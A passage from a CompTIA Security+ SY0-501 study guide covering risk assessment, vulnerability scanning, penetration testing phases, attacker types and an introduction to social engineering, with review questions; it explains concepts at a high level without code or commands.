4. If your work so far was used in a formal risk assessment, how would the document be useful to an
attacker?
Specific answers may vary, but an attacker can use detailed knowledge of the controls you deploy, and of
the ones you have chosen not to, in order to plan an attack.

CompTIA Security+ Exam SY0-501 33


Chapter 1: Security fundamentals / Module B: Risk management

Assessment: Risk management


1. Order the steps of a complete risk assessment.

3. 1. Analyze business impact


2. 2. Conduct a threat assessment
6. 3. Create a mitigation strategy
4. 4. Evaluate threat probability
1. 5. Identify assets at risk
5. 6. Prioritize risks
5, 2, 1, 4, 6, 3
2. Qualitative risk assessment is generally best suited for tangible assets. True or false?
 True
 False

3. You're shopping for a new A/C unit for your server room, and are comparing manufacturer ratings. Which
combination will minimize the time you'll have to go without sufficient cooling? Choose the best
response.
 High MTBF and high MTTR
 High MTBF and low MTTR
 Low MTBF and high MTTR
 Low MTBF and low MTTR

4. Your company has long maintained an email server, but it's insecure and unreliable. You're considering
just outsourcing email to an external company who provides secure cloud-based email services. What risk
management strategy are you employing? Choose the best response.
 Risk acceptance
 Risk avoidance
 Risk deterrence
 Risk mitigation
 Risk transference

5. What element of your risk mitigation strategy helps keep future additions to your network from
introducing new security vulnerabilities? Choose the best response.
 Change management
 Incident management
 Security audits
 Technical controls

34 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Module C: Vulnerability assessment


As a security professional, you need to be constantly aware of the vulnerabilities in your organization. When
you perform a risk assessment, you need to know the existing vulnerabilities of your assets. Once you apply
mitigation techniques, you need to test their effectiveness. Even as part of periodic assessments, you need to
search for new or overlooked vulnerabilities. While actually performing vulnerability assessments requires
technical knowledge about attacks and data systems covered later in this course, the underlying process is just
a matter of understanding your security goals.
You will learn:
 About vulnerability testing
 How to perform vulnerability scans
 How to plan a penetration test

About vulnerability assessments


Vulnerability assessments can take many forms: the common theme between them all is that they search for
vulnerabilities that might otherwise go unnoticed. Some focus on computing assets, such as hosts and network
resources; others reach further into other aspects of your organization. The most effective assessments rely on
a combination of techniques, but since some methods are easily automated while others are more labor
intensive, you might want to perform different assessments at different times as part of an ongoing process.
For example, a comprehensive vulnerability assessment of a network and all of its components would at the
minimum require the following elements.

Baseline review Comparing actual network performance to your security baseline, or existing security
configuration. The review should look not only for security settings that don't match the
baseline expectations, but also for events and usage patterns that don't match expected
values. Performance issues in particular could represent DoS attacks, rogue server
activity, or even overly restrictive security settings slowing down the network. Even
when performance-related deviations from the baseline don't turn out to be security
related, network administrators should be made aware of potential performance
problems.
Determining the The network's attack surface is all of the software and services installed which can be
attack surface subject to attack. Network hardening is intended to reduce the attack surface by removing
unnecessary services and blocking potential attack vectors. Beyond simply reviewing
device configurations, vulnerability scanning tools are one of the primary ways of testing
a network's attack surface. Penetration tests are another.
Reviewing code Insecure application design is one of the chief sources of network vulnerability. Not only
should software used on the network be validated for security before it's installed, but it
should be reviewed for potential problems after updates, when there's a reason to suspect
a problem, or just as part of periodic comprehensive review processes. It's most
important to have a security tester review all code for custom or in-house applications
since they're entirely your organization's responsibility, but outside applications should be
reviewed as well. While you can't directly review the code for proprietary applications,
you can make sure you choose software from trusted vendors, and regularly check for
published vulnerabilities from the vendor or the security community.

CompTIA Security+ Exam SY0-501 35


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Reviewing Vulnerabilities in system architecture, both hardware and software, are another source of
architecture risk. To some extent this might sound like making sure hosts are up to date and have
antivirus software installed, but it goes deeper than that. For example, processors in
newer systems include hardware features preventing many application attacks that can be
used against older systems, and newer operating systems more strictly control application
privileges that could be exploited in the past. Some systems have optional features
specifically designed for high security environments. Making sure that network hosts and
devices have an architecture that meets their required security level will help keep your
network secure, as will watching for new developments which you can use for future
upgrades.
Reviewing design When you configure systems, assemble networks, design applications, or apply any sort
of new solution, you need to review its design and make sure it doesn't have any
outstanding security vulnerabilities. This includes security policies themselves. Not only
is it good practice to make sure your organization checks its own work, but design review
is important for professional and legal reasons as well: if something serious does go
wrong, demonstrating due diligence in securing the network can reassure stakeholders
and shield you and your organization from liability.

Vulnerability scans vs. penetration tests


Two of the most frequently discussed approaches to vulnerability assessment are vulnerability scans and
penetration tests. The problem is that casual discussion frequently conflates the two, or describes one as the
other, so it's important to understand the distinction.

Exam Objective: CompTIA SY0-501 1.4.10, 1.5.1, 5.3.2.11


A vulnerability scan is a broad and fundamentally passive scan that examines the entire system, network, or
organization, checking for a specific list of known vulnerabilities. The scanning process might be passive and
invisible to security systems, or it might be active and prone to set off alarms, but it doesn't actually aim to
compromise assets so much as catalog ways they could be compromised. If you know your organization has
security vulnerabilities and want to discover and fix as many as possible, a vulnerability scan is the best way
to go.
A penetration test is a simulated attack designed to prove that an asset can be compromised. The penetration
tester, who may or may not have detailed knowledge of existing security controls, uses known attack methods
to bypass security and compromise the system. If the attack fails, the system has passed the test. A penetration
test is active and intrusive, but more focused, and isn't likely to uncover vulnerabilities not directly between
the tester and the goal. If you think your system is secure, but want to confirm your work, a penetration test
might be a good way to do it.
In information security, both vulnerability scans and penetration tests generally refer to tests against systems
and networks specifically, but like many security concepts they can apply just as well to any level or type of
organizational security, and might even be easier to compare in that context. Imagine that you're the head of
security for an art collection.
 To conduct a vulnerability scan, you might personally go through the whole building with checklist in
hand and methodically search for problems. At the end you'd have a list of every unlatched window,
easily picked lock, weak security code, unresponsive alarm sensor, and camera blind spot you could
find.
 To conduct a penetration test, you might hire a skilled ex-burglar turned security consultant, and give a
simple challenge. "By this time next month, I want you to steal the velvet Elvis I stashed in with the
third floor collection, without being detected by any guards." If the painting goes missing, you
obviously have room to tighten up security, and the burglar can probably give some suggestions how.

36 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

This example highlights another important point about vulnerability testing: in both cases you'll want to make
sure the rest of your security staff, and general management, knows there's testing going on. Even if the
guards shouldn't know exactly when and how the attack will transpire, you don't want the burglar to be
arrested or shot. Even if you're just probing existing defenses, you don't want security to overreact to an alarm
going off, or a report of someone trying to open a window from the outside.

WARNING: The same is true when you test network or host security: before you perform a vulnerability
scan or especially a penetration test, you need to make sure you have the knowledge and written consent
of network administrators and management. If you're caught making unauthorized probes or attacks,
they wouldn't be wrong to suspect you're an attacker yourself, and you might soon find yourself facing
disciplinary action or even criminal charges.

Vulnerability scan types


A vulnerability scan is fundamentally a passive test of security controls. It doesn't actually attack or
compromise any resources: instead it just looks for vulnerabilities that would allow a real attack to succeed.
One of the most common ways to scan for vulnerabilities is a software application called a vulnerability
scanner. Vulnerability scanners might target network services, operating systems, specific applications and
devices, or a combination of the above. Popular examples of comprehensive vulnerability scanners include
the proprietary SAINT and Nessus, and the open source OpenVAS. A good vulnerability scanner will probably
become popular both with security testers and with hackers: the only difference is whether the person using it
plans to use the findings to close vulnerabilities or to exploit them.

Exam Objective: CompTIA SY0-501 1.5.5, 1.5.6. 2.2.5, 2.2.13


Scans can be intrusive or non-intrusive. A non-intrusive scan focuses on monitoring communications, or
making routine requests for information that will give information about the system and its potential
vulnerabilities, but won't do any harm. It might set off security alarms, though, if the network has a system
configured to watch for scans an attacker might perform. By contrast, an intrusive scan might use larger
traffic volumes, unusual messages, or attempts to gain system permissions. It's still less invasive than a real
penetration test, and it won't deliberately compromise systems, but an intrusive scan is much more likely to
trigger security alarms, and might even disrupt or crash vulnerable or unstable systems as a side effect.

Note: Just because a scan is non-intrusive doesn't mean you don't need permission to perform it, or that
it won't be noticed.
Scans can also be credentialed or non-credentialed. A non-credentialed, or non-authenticated scan doesn't use
any special permissions or user credentials: it approaches the system or network in much the way that an
outside visitor would see it. A credentialed, or authenticated scan requires user credentials for the hosts or
resources being scanned. This can give you much more information, since you can directly view security
configuration data that a non-credentialed scanner has to poke around and guess at. It's also less intrusive and
generates less traffic: if you can directly query a host's operating system about what application ports it has
open, you don't need to send requests to thousands of separate ports over the network to see which reply.

Goals of vulnerability scanning


Depending on the type of vulnerability scan you're making, you might be targeting any combination of
network devices, operating systems, applications, or existing security settings. Especially when you use
automated tools you'll be looking for known, generally common vulnerabilities or other problems from a list.
What's on the list depends entirely on your search methods, but potential problems fall into a number of
categories.

Exam Objective: CompTIA SY0-501 1.5.2, 1.5.3, 1.5.4, 1.5.7 1.6.9, 1.6.14, 2.3.8

CompTIA Security+ Exam SY0-501 37


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Missing security controls The scan might turn up common security measures that aren't installed or have
been disabled. For example, a host's firewall software might be turned off, or a
wireless access point might be open and unencrypted.
Open ports Most network scanners search for open network ports on hosts, each of which
represents a network service that is running and not blocked by a firewall. If a
service is properly secured and serves an important function, the open port isn't a
problem. If it's insecure, unauthorized, or just unnecessary, it's a potential
vulnerability.
Weak passwords Scans can include password cracking attempts, or checks for default
username/password combinations on network devices. If an automated scan can
find user credentials for a resource, an attacker certainly can.
Weak encryption Many network protocols use cryptographic controls for security, but there are a lot
of encryption standards. Some are seriously flawed or outdated, and easily cracked
by an attacker. Weak encryption is a vulnerability because it can be cracked, and
because it can give a false sense of security.
Misconfigured security Hosts, devices, and applications can all have configuration problems that
controls compromise security. Depending on your scan, you might look for particular
common mistakes, or you might compare settings against a standard baseline and
look for deviations.
Unsecured data Data can be stored in the wrong place on the network, or without adequate
security controls. DLP software can include features to recognize sensitive data
that isn't properly secured.
Compromised systems It's possible that a vulnerability scan can pick up signs of compromised security,
such as rogue servers, malware infection, unauthorized user accounts, or
deliberately sabotaged security controls.
Exploitable Every operating system or application has programming flaws that an attacker can
vulnerabilities exploit. Many scanners are designed to check target systems against known
common exploits so that you can patch or otherwise secure them.
Unpatched systems Scanners, especially credentialed ones, can sometimes check version and update
status for device firmware, operating systems, or application software. Security
updates for any of these might contain patches for vulnerabilities, even ones
you're not specifically scanning for.

Vulnerability scanners aren't perfect. Not only will they miss vulnerabilities they're not programmed to
recognize, it's possible to have false positives. In the context of vulnerability scanning, this means the scanner
thinks it's found a vulnerability but it's actually not a problem or has been mitigated by another security
control the scan didn't detect. This can lead you to spend resources diagnosing or fixing problems that aren't
really there. In some cases, you might have to actually test a vulnerability to determine whether it's genuine.

Discussion: Vulnerability assessments


1. If a credentialed vulnerability scan gives more information and generates less traffic, why run a non-
credentialed scan?
A non-credentialed scan gives a more accurate depiction of what an outside attacker would see, so can
help you find what vulnerabilities are most likely to be attacked.
2. What is the attack surface of your local network?
Exact answers may vary, but it includes the hosts, devices, and network services an attacker might search
for vulnerabilities in.

38 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

3. To your knowledge, are all the computers and devices on your local network updated and configured with
security software?
Answers may vary, but even if you think so you'd need the results of a vulnerability scan to verify it.

Penetration testing
Just like a vulnerability scan, how far you take a penetration test depends on your security needs and the
resources you want to put toward it. Likewise, some elements can be performed by automated tools while
others require intense human review. The biggest difference is that the penetration test is fundamentally active
and intrusive. You're not just examining the system to look for where it might break: instead, you're picking
one or more expected weak points and actually trying to hammer them open.
The best penetration tests require significant research and expertise. While you could in theory perform a
penetration test against the security controls you installed, you're probably not the best person. No matter your
skills, someone with a different perspective and knowledge can give a much better simulation of an attacker
trying to out-think you. This could be another security expert in your organization who was less involved in
designing the system, but for more formal testing it's popular to hire an outside consultant. One good choice is
a white hat or ethical hacker. A white hat hacker has the same skills and tools as a criminal black hat hacker
or cracker, but only uses them in order to test and improve security systems. Large organizations sometimes
assemble or hire tiger teams or red teams comprised of multiple white hats or other security experts working
in concert to penetrate security systems.

Goals of penetration testing


At its core, a penetration test is designed to verify that a theoretical threat exists—not in the sense of "does
this attack exist at all?", but rather "can this attack really damage my newly secured system?" If the tester
can't compromise the system, it means your security controls are a success; you still have to maintain and
improve security in the future, but for now you've done a good job. If the tester succeeds, it means you've got
more work to do before you can call your system secure.
The precise goals and metrics of a particular test by contrast might vary quite a lot, especially depending on
the threats you're testing against. The "win" condition for the tester doesn't have to be stealing data: it could
also be disrupting network traffic, crashing essential systems, or anything else that harms your assets.
Penetration tests also don't always have to be a direct test against a specific vulnerability: they can use the full
range of techniques a hacker does, creatively exploiting vulnerabilities and bypassing security controls in
combination to compromise security step by step. Consider an example. As a penetration tester, your main
goal is to steal trade secrets from the company's file server. The server's been specially secured by host and
network security controls so that it can be accessed on its LAN, but not from outside the corporate network.
The security controls used seem pretty solid, but your network probing showed that the same part of the
network has a web server vulnerable to SQL injection, a type of database attack. By injecting the right
commands you can get remote login credentials on the web server. Once you've done that, you find the file
server isn't well protected against inside attack, and you're able to download the secret files.
One thing penetration tests don't do is comprehensively scan for vulnerabilities like a vulnerability scan::
you'll only know the status of vulnerabilities the tester tested. In the previous example, your report to the
system's owner will include the web server's SQL vulnerability and the weaknesses of the file server against
inside attack. If there was also a firewall vulnerability you could have exploited, but didn't actually think of
before you succeeded your way, it's still undiagnosed and leaving the network vulnerable.

CompTIA Security+ Exam SY0-501 39


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

The penetration testing process


The basic process of a penetration test is easy to understand even if you have little experience with the tools
and technologies involved. It's also a process every security professional should understand intimately; by and
large, it follows the same steps as the real attacks you'll need to defend against.
NIST breaks the process down into four main phases, though other sources group or subdivide them
differently.
 Planning
 Discovery
 Attack
 Reporting

As the illustration shows, the phases aren't strictly linear. If an attack doesn't work, the tester can return to the
discovery phase for new leads instead of giving up. Likewise reporting that's the ultimate goal of the test can
come from any previous step.
While it's possible for a penetration test to be carried out against production systems, there are many cases
where you wouldn't want to do that. In particular, penetration tests often include techniques that can disrupt
services, crash servers, or otherwise harm normal operations. In these cases, a useful substitute is a test
environment designed to duplicate the configuration and security controls of the production environment as
closely as possible.
You can also use such simulated environments to carry out other security exercises, such as testing new
controls or procedures, or training security personnel in a test environment before they protect production
systems.

Penetration test tools


In the movies hacking a system takes little more than a lot of fast typing in an ominously colored window, but
real penetration tests require a variety of tools. Depending on the nature of the test, almost any vulnerability
scanning tool might have a part; additionally, there is software specifically meant for penetration testing.
Password crackers and exploitation frameworks such as Metasploit or Core Impact are especially popular.
There are even entire operating system distributions designed for penetration testing, including a variety of
pre-configured tools. Options include Kali Linux, WHAX, and Pentoo. In more involved and expensive
penetration tests, tiger teams might write their own exploit software, custom designed for their chosen targets.

Exam Objective: CompTIA SY0-501 1.4.7, 1.4.8, 1.4.9, 2.2.7


The other important tool penetration testers have is their knowledge of the systems they're attacking.
Typically, this is carefully controlled as part of the nature of the test. There are three approaches that can be
taken with regard to tester knowledge.

40 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Black box test The tester is given no knowledge of the system before the test. Like a real hacker, the
tester will need to research public sources of information about the organization and its
assets, examine the network from the outside, and otherwise try to figure out what attacks
might work before trying them. Black box testing can require lengthy research, and the
tester can't easily discover all vulnerabilities, but it's a very real simulation of how
security controls can hold up against outside attackers.
White box test The tester is given full knowledge of existing security controls, system configurations,
policies, and other documentation about the system and its potential vulnerabilities. The
goal is to give the tester a complete understanding of the system and ability to hit it where
it's weakest. White box tests are the most thorough type of penetration test, and the
hardest for even a strong security system to withstand, but they don't give a very accurate
picture of what an uninformed outside attacker could do so much as an attacker with a lot
of inside information.
Gray box test The tester is given some knowledge of the existing security configuration, but not a
complete picture. The actual details can be anywhere between a white box and a black
box: for example, the tester might be given a list of hosts along with their roles and
network addresses, but not detailed security configurations.

Note: Don't confuse black and white box testing with black and white hat hackers. The former refers to
the attacker's knowledge, while the latter is a matter of intent.

Network reconnaissance
Planning to penetrate a network, whether you're a red team or a real attacker, can itself be broken into three
basic phases.

1. Passive reconnaissance
2. Active reconnaissance
3. Vulnerability analysis

Exam Objective: CompTIA SY0-501 1.4.1, 1.4.2


The goal of all three of these is to put together as complete an idea as possible of what assets the target has,
how they are arranged, and what ways you can achieve at least an initial foothold on their network. You might
not be able to tell absolutely everything yet, but once you're in the system you can perform even better
reconnaissance later.
If you're performing a white box test you'll already have a lot of network information, but in a black box test
you'll initially need to rely on open source intelligence you can gain from the outside. The best place to start is
by passive reconnaissance, or gathering whatever information you can about your target without directly
sending them any information about your presence. Targets of passive reconnaissance might include:
 The organization's website and public records
 News stories and press releases about the organization
 Contact names and email addresses
 Job boards
 Company privacy policies
 Social media and website posts by current or former employees

CompTIA Security+ Exam SY0-501 41


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Active reconnaissance involves techniques that might tip the target off that they're being targeted, and how.
Active methods include network probes and direct contact with employees via social engineering. They also
include semi-passive techniques such as passive network scans that look like normal network traffic, and
subtler eavesdropping and other social engineering approaches that have a low chance of being recognized.
The difference between the two really is just a matter of degree, and how much you rely on which depends on
just how much time you have and how critical it is not to be noticed. For both, the goal is to paint a more
detailed picture of the network structure, individual servers and other assets, and employee behaviors and
policies.
Finally, vulnerability analysis is very much like running vulnerability assessments as a defender, except with
the goal of finding avenues of attack. This may require more scanning to be certain, or even launching
experimental attacks to gain access. In a particularly large scale penetration test, even the attackers might use
test systems to refine specific techniques before trying them against live defenders.

Penetrating networks
Once you figure out possible avenues of attack, you need to try them. The initial exploitation phase isn't the
end goal; in fact, against a network that practices defense in depth or has active defenders it may not get you
very far or last very long. This means that when you establish a foothold you need to act quickly and choose
your next step. Once you've successfully used an exploit you have three main approaches you can take, in any
order or combination.

Exam Objective: CompTIA SY0-501 1.4.3, 1.4.4, 1.4.5, 1.4.6

 Escalate privileges to get more control over the infiltrated system.


Escalating privileges is especially important when your initial access has strictly limited permissions.
• Gathering user names or password hashes to crack
• Gaining additional privileges through vulnerable processes
• Finding exploitable information in shared folders
• Installing malware that establishes administrative privileges
 Establish persistence, or ways that you can regain access if you lose it.
Persistence is especially important when your initial exploit can be easily discovered and halted, or if
it's a temporary exploit like hijacking an existing session.
• Installing backdoors
• Creating alternate accounts
• Compromising authentication systems to make further attacks easier
 Pivot to gain access to other systems on the network you could not view or access before.
• Perform reconnaissance on internal networks, using the compromised system as a vantage point
• Create tunnels to bypass firewalls and other network boundaries
• Exploit trust relationships to access additional systems

42 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Discussion: Penetration testing


1. What's the difference between black, white, and gray box testing?
How much knowledge the attacker has about the system.
2. What advantages does a penetration test have over a vulnerability assessment?
A penetration test puts your defense to practical test against an outside attacker, and might find
vulnerabilities you hadn't anticipated.
3. Why can't penetration tests replace vulnerability assessments?
Penetration tests aren't comprehensive, especially if they're black or gray box. They only test
vulnerabilities the testers think of, and only those relevant to their goals.
4. As a black box tester, where would you find open source intelligence about your organization's security
assets?
Answers might include public records, news stories, social media postings, and job sites.
5. Why is the pivot a critical part of a penetration test?
If you can't view or access the entire network from outside, the initial exploit becomes your way to reach
further.

CompTIA Security+ Exam SY0-501 43


Chapter 1: Security fundamentals / Module C: Vulnerability assessment

Assessment: Vulnerability assessments


1. A vulnerability scan can be intrusive or non-intrusive. True or false?
 True
 False

2. What steps might be taken as part of a vulnerability scan? Choose all that apply.
 Bypassing security controls
 Exploiting vulnerabilities
 Finding open ports
 Identifying vulnerabilities
 Passively testing security controls

3. What element of a vulnerability assessment compares security performance to existing security


configuration documents? Choose the best response.
 Architecture review
 Baseline review
 Code review
 Design review?

4. What kind of penetration test involves a tester with full knowledge of your network configuration?
Choose the best response.
 Black box
 Black hat
 White box
 White hat

5. Vulnerability scanners are a good way to determine a network's attack surface. True or false?
 True
 False

6. While conducting a penetration test you've just managed to get access to an important server. The main
problem is that you got it through a session hijacking attack that took both luck and precise timing, and
might be cut off at any time. Given limited time, what should your next step be? Choose the best
response.
 Escalate privileges
 Establish persistence
 Perform reconnaissance
 Pivot

44 CompTIA Security+ Exam SY0-501


Chapter 1: Security fundamentals / Summary: Security fundamentals

Summary: Security fundamentals


You should now know:
 About security concepts such as the CIA triad and security controls; how to distinguish between risks,
threats, and vulnerabilities; how to apply secure design principles, and how to distinguish events and
incidents.
 How to identify assets and threats, and how to calculate and manage risk
 About vulnerability assessments, and how to plan vulnerability scans and penetration tests.

CompTIA Security+ Exam SY0-501 45


Chapter 2: Understanding attacks
You will learn
 How to categorize attackers
 About social engineering
 About network attacks
 About application attacks
 About malware

CompTIA Security+ Exam SY0-501 47


Chapter 2: Understanding attacks / Module A: Understanding attackers

Module A: Understanding attackers


When you start off securing informational assets it's easy to just think in terms of what's vulnerable to
"hackers", but you can come up with far more effective defenses if you know what they want from you and
what tools they have at their disposal.
You will learn:
 How to categorize attackers by motivation
 How to categorize attackers by threat characteristics

About hackers
Originally, "hacker" wasn't a term for people who break into computers and steal things. It simply referred to
enthusiastic computer programmers who found intellectual challenge in their work. Since computers decades
ago were very limited in both hardware and software, a large part of this challenge was overcoming those
limitations and making computers or programs do things their initial designers never imagined. One of the
more literally colorful examples of this original form of hacking is the computer art subculture called the
"demoscene", where artists and programmers design complex audiovisual presentations called demos. The
original demos were designed for very simple home computers with tight hardware limitations, so it was very
challenging to include ever more impressive graphics, animations, and music. Demoscene programmers
developed many innovative workarounds to push the limits of common systems, as well as graphical
programming techniques that are still used in game design and 3D rendering.
While many of these early hackers were perfectly legitimate programmers working with systems and software
they had every right to experiment with, others already saw security measures as one more limitation to
overcome. Even the demoscene began with hackers who bypassed copy protection on early computer games
and applications. Many early hackers were also involved in phreaking, the practice of manipulating analog
telephone circuits, for example to make free long distance calls. As computers and networks developed
further these criminal hackers, or crackers, constantly devised new malware techniques and network attacks
to access them, either to steal information, damage systems or data, or just prove that they could get in. In the
public mind, it wasn't long before "hacker" came to meant specifically those who try to bypass security, rather
than the other elements of the culture.
Whichever version of the term you use, hacking is alive and well today. When it comes to security, matter
how we protect our computers and networks there's no shortage of hackers coming up with sophisticated new
attacks to undo those protections. Not all of them are even malicious. One of the simplest way hackers divide
themselves these days is by ethical boundaries.

Black hat Criminal hackers who break computer security for personal gain or other malicious purposes.
These are the dangerous attackers you have to worry about, who will steal or destroy
information, spread malware, or otherwise damage your computing assets. They may work
alone, in the employment of others, or in association with like-minded black hats.
White hat Security experts who study and practice hacking, but only use it for legal purposes such as
finding countermeasures against other hackers. Also known as ethical hackers. White hats
often find employment finding vulnerabilities or performing penetration tests, but only act
with the permission of system owners.
Grey hat Hackers who are neither really black hats nor white hats. They include those who research
security flaws as a recreational exercise, those who break into systems without permission but
do no intentional harm, and those who believe they are only acting to improve the state of
computer security but also don't really care if their activities violate the law. Grey hats often
are technically criminals, but usually aren't as serious a threat as black hats.

48 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module A: Understanding attackers

Attacker qualities
White hats pose no threat to you: they won't attack your systems unless you ask. Other attackers can be a
threat, but exactly what kind they are depends on what they want from you, and what they can do. Some
important questions include the following

Exam Objective: CompTIA SY0-501 1.3.2, 1.3.3

Intent Attackers might be motivated by any number of reasons. Some are after specific resources
or information, others will take whatever they can find, and others just want to deny service
or destroy information. Likewise, their underlying motivations may be personal, financial,
or political.
Sophistication Some attackers are relatively inexperienced, relying on automated tools or simple
vulnerabilities. Others use much more subtle or personalized methods that can threaten even
a secure organization, or even discover zero-day attacks which existing defenses cannot
protect against.
Resources While the stereotypical lone hacker using a home PC in some basement does exist and can
do real damage, others can be even more threatening. Launching a major attack isn't easy,
and might require significant computing resources, research time, or manpower. Some
attackers are groups working to a common cause, and even lone attackers might gain access
to a large number of computers only to use them to design even more powerful attacks.
Location Some attacks require physical proximity to your computing resources, while others can be
conducted from anywhere in the world. In both cases, there's a big difference between
outside attackers who must first overcome your organization's external defenses, and inside
attackers who already have at least some legitimate access. Inside attackers are far harder to
defend against.
Target Some attackers might know little about your organization, and just probe at random
information network addresses until they find something vulnerable. Others, especially inside attackers,
might have critical information about your assets and vulnerabilities which they can use to
mount successful attacks. Others rely on open-source intelligence - that is, information they
can gather about their targets from publicly available sources. Regardless of what
knowledge they start with, dedicated attackers will begin by gathering more knowledge, and
begin with attacks meant to teach them more about your assets and defenses.
Note: You actually have some control over what open source intelligence
attackers have access to. The less you reveal to outside parties about your
informational assets and network configuration, the less attackers will
know without performing more active research or probes that you might
detect. Remember that once information becomes public you may never be
able to hide it again.

CompTIA Security+ Exam SY0-501 49


Chapter 2: Understanding attacks / Module A: Understanding attackers

Common attacker types


The first criminal hackers to really gain public attention were freelance thrill seekers or data thieves with no
particular allegiances. That sort of attacker hasn't gone away, but there are many other common types today.

Exam Objective: CompTIA SY0-501 1.3.1

Script kiddies Unskilled hackers who rely on commonly available attack tools (including malicious
scripts, thus the name.) Commonly script kiddies deface websites, spread malware, or
interrupt services, but against poorly secured networks they can do even more damage.
Hacktivists Hackers who attack organizations to further a political or ideological message. Some
represent political, religious, or economic ideologies that aren't inherently computer related,
and target perceived enemies of those groups. Others belong to freedom of information
movements specifically oriented toward the idea that some or even all secret information
should be released to the public. Such hacktivists might target any organization that stores
data they believe should be free. Some hacktivists are also called cyberterrorists, especially
if their methods would cause major disruptions to infrastructure, widespread panic, or
human injury or death.
Organized Criminal hackers seeking financial gain who work as part of a larger organization. The
criminals organization itself might be connected to traditional criminal organizations, or might be
focused entirely on hacking. Either way, such attackers will target any resources they can
sell to others. They may also seek to clandestinely gain system access for other operations,
or information they can use to blackmail senior executives.
Competitors Unethical businesses frequently attempt attacks on competitors, either to commit industrial
espionage or to sabotage valuable resources.
Insiders Many attacks are caused by employees, former employees who have retained network
access, or others who already have knowledge of and access to the network.
 Inside thieves and embezzlers will target financial resources or valuable intellectual
property. This sort is especially likely to work for a competitor or criminal
organization.
 Disgruntled employees motivated by revenge against coworkers or superiors may
sabotage systems or data, or otherwise try to cause whatever harm they can to assets.
 Employees who misuse company resources for personal purposes or to make their
own jobs easier may mean no direct harm, but their actions can hurt performance and
compromise security.
 Some employees attack systems to preserve their own job security. They might
deliberately create problems only they know how to fix, or even sabotage systems in
subtle ways that won't become apparent until after they've been fired.

Nation states Many nations today employ intelligence agencies and dedicated cyberwarfare
organizations to perform attacks against rival governments, businesses, political
organizations, and anyone else they perceive to be a threat to their national interests. Major
governments have unparalleled attack resources: they can devote large numbers of skilled
attackers, powerful computers, and custom-made attack tools and exploits to compromise
their targets. Some can even use governmental authority to compromise third parties such
as equipment manufacturers or software vendors.

50 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module A: Understanding attackers

APT More an attack type than an attacker type, an advanced persistent threat is ongoing series
of sophisticated attacks against a particular organization. APTs tend to target organizations
with high-value data; they use long-term strategies of stealthy attacks from multiple angles,
changing over time to adapt to evolving defenses. This makes them a real test of even the
strongest organizational security. It takes a lot of resources and patience to conduct an APT,
so it's a technique mostly used by nation states and the most capable corporate or organized
criminal hackers.

Discussion: Attackers
1. If you've determined your assets and attack surface, why is it important to know the motivation of likely
attackers?
Motivation affects both that's most likely to be attacked and what the consequences of an attack would be.
For example, ordinary criminals might target customer payment credentials while a competitor would
have more interest in trade secrets and business operations. An inside attacker employed by someone else
is likely to steal important data, while one simply upset with management might rather destroy it.
2. What kinds of attackers are likely or unlikely for your organization to face?
Answers may vary. Any network can be attacked by script kiddies or disgruntled employees, but not every
organization is likely to be of much interest to state actors or hacktivists.

Assessment: Understanding attackers


1. What category of attackers are defined by their limited sophistication and reliance on pre-packaged tools?
Choose the best response.
 APTs
 Hacktivists
 Organized criminals
 Script kiddies

2. What kind of attacker is an APT most commonly associated with? Choose the best response.
 Business competitors
 Hacktivists
 Nation states
 Script kiddies

3. What category of attacker might also be called cyberterrorists? Choose the best response.
 Hacktivists
 Nation states
 Organized criminals
 Script kiddies

CompTIA Security+ Exam SY0-501 51


Chapter 2: Understanding attacks / Module B: Social engineering

Module B: Social engineering


When you think of attack vectors, you probably think of viruses, network attacks, password cracking, and
other technological weapons. These exist, and you need to know about them, but they're hardly the only
threats your organization faces. Some of the most common and effective attacks target the human element of
your organization, tricking or manipulating employees into letting attackers bypass security controls. These
social engineering attacks be found anywhere, and can be as difficult to defend against as any sophisticated
network assault. Fortunately, they rely on human impulses and practices that even non-technical staff can
learn to understand and defend against.
You will learn:
 Why social engineering is effective
 About impersonation
 About phishing and spam
 How social engineering can violate physical security
 How to minimize the risk of social engineering attacks

About social engineering


A misanthrope would tell you that humans are naive, unobservant, lazy creatures of habit who are terrible at
judging risk. Someone more optimistic might instead say that people are trusting, distractingly overworked,
and uneducated about security principles. It doesn't really matter how you see it: the important thing is that no
matter how bulletproof the security technology of an organization is, it can all be undone by insecure human
practices. Beyond that, while hackers have been developing their techniques for years, conventional thieves
and con artists have been honing their skills throughout human history.
Social engineering attacks take advantage of human behaviors to steal information directly, bypass security
measures, or compromise systems against future threats. Even an attacker with limited technological
knowledge can threaten advanced systems this way, especially by tricking a technician into doing the damage.
Social engineering is one of the biggest sources of security threats, and one of the most consistently
overlooked, so it's important to recognize attacks.
The most common factor in social engineering attacks is impersonation. Whether in person, by phone, or by
email, attackers pretend to be coworkers, technical support, bank workers, or other legitimate actors, just to
get others to let their guard down. It's surprisingly effective to just ask someone for their password, if you
have a good excuse about why you're not just a nosy stranger. Likewise, it's not hard to openly wander around
many secure areas: most others will be too busy to notice unless you call attention to yourself. Another
common factor is taking advantage of insecure behaviors in the real world: many users don't think of physical
security and computer security as part of the same whole.
Impersonation itself is just one part of the more central exploitation of trust. Social engineering is a key factor
in inside attacks, when a disgruntled or otherwise malicious employee exploits the trust of coworkers to do
harm. Inside attackers might not impersonate anyone else at all, but they're still pretending to be acting
honestly and with the best interests of the organization in mind even while they're working to sabotage it.
Often, inside attackers use coworkers as tools to gain access and permissions they don't have themselves, in
the human equivalent of a privilege escalation attack.

52 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module B: Social engineering

Why social engineering is effective


Social engineering seeks to manipulate users by exploiting human emotional traits like fear, greed, and pity.
Some of these traits, such as a sense of altruism, are not considered to be faults in most contexts, making them
even easier to exploit. This type of manipulation is as old as society itself.

Exam Objective: CompTIA SY0-501 1.2.1.11, 2.3.9.3


